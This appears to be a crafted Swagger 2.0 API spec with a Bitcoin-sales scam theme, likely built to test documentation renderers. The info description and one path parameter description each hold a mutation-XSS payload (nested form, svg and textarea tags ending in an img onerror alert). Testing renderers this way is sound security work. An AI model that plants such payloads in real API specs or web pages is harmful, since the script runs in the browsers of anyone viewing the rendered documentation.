swagger: '2.0'
info:
  title: Comercio de Bitcoins para funcionarios internos
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /compraBitcoinSeguro:
    post:
      responses:
        '200':
          description: No response was specified
      tags:
        - compraBitcoinSeguro
      operationId: findAccounts
      summary: Compre com um clique
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - compraBitcoinSeguro
      operationId: deleteGroupById
      summary: Delete seus rastros
definitions:
  '':
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  Account:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
securityDefinitions:
  basicAuth:
    type: basic
tags:
  - description: Apenas bitcoin e etherium são aceitas
    name: Venda de Bitcoins 100% Seguro pelo Pagbank!!!